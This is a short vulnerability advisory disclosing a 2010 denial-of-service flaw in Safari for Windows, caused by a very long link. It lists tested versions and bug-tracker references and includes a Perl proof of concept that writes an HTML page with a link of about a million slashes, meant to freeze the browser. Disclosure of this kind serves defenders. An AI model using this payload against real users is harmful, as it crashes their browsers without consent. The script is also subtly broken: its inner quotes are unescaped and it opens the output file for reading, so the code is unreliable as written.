Safari for windows Long link DoS

############################################
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Vendor notified:Yes exploit available: YES
############################################

Safari is prone vulnerable to Dos with a very long Link...
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
and it turn Frozen resulting in a Denial of service condition.

#################
Versions Tested
#################

I have tested this issue in win xp sp3 and a windows 7 fully pached.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

############
References
############

Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:

####################
Proof Of Concept
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Safari 5.0.1 ( 7533,17, and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href="about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "">click here if you can </a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################